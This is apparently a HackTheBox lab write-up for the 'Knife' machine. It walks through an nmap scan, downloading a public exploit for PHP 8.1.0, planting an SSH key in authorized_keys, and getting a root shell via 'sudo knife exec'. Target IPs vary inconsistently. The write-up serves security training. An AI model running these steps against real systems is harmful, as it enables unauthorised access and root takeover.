HTB: Knife
Machine IP: 10.129.139.25
System IP: 10.10.16.12
One of the easiest boxes for a beginner. Just don’t overthink and look for vulnerabilities for the things you see on surface.
Let’s start with network mapper (Nmap)
nmap -A -T4 -p- -v 10.129.139.27 -oN ./nmap.txtwhich output the following
Nmap scan report for 10.129.139.27
Host is up (0.26s latency).
Not shown: 65431 closed ports, 102 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPort 80
On inspect I found that it’s running on `php 8.1.0` and with a simple google I landed on exploit.db link.
After we copied the python code to our system
wget https://www.exploit-db.com/raw/49933then on running the exploit I provided the IP of target and boom we are inside system :)
Inside `/home/james/user.txt` we got the user flag.
let’s check for sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
but our shell isn’t stable at all so :’) we are not able to navigate properly.
So lets try doing login via ssh but as we can’t use wget so we need to echo our public key to authorized key. Note: you have to first generate the key pairs link.
echo "ssh-rsa AAA......." > ~/.ssh/authorized_keysand then ssh from our machine
ssh -i id_rsa james@10.10.10.242On executing
sudo /usr/bin/knifewe find this
So we have to basically create a script and execute it as root :) what on earth we want. Just execute the shell as root.
Now let’s run it to get the root shell
sudo knife exec --exec "exec '/bin/sh -i' "
So what we doing here is to execute the line /bin/sh -i as a root user since we can execute it with sudo.
Thanks for reading and stay tuned for similar writeups.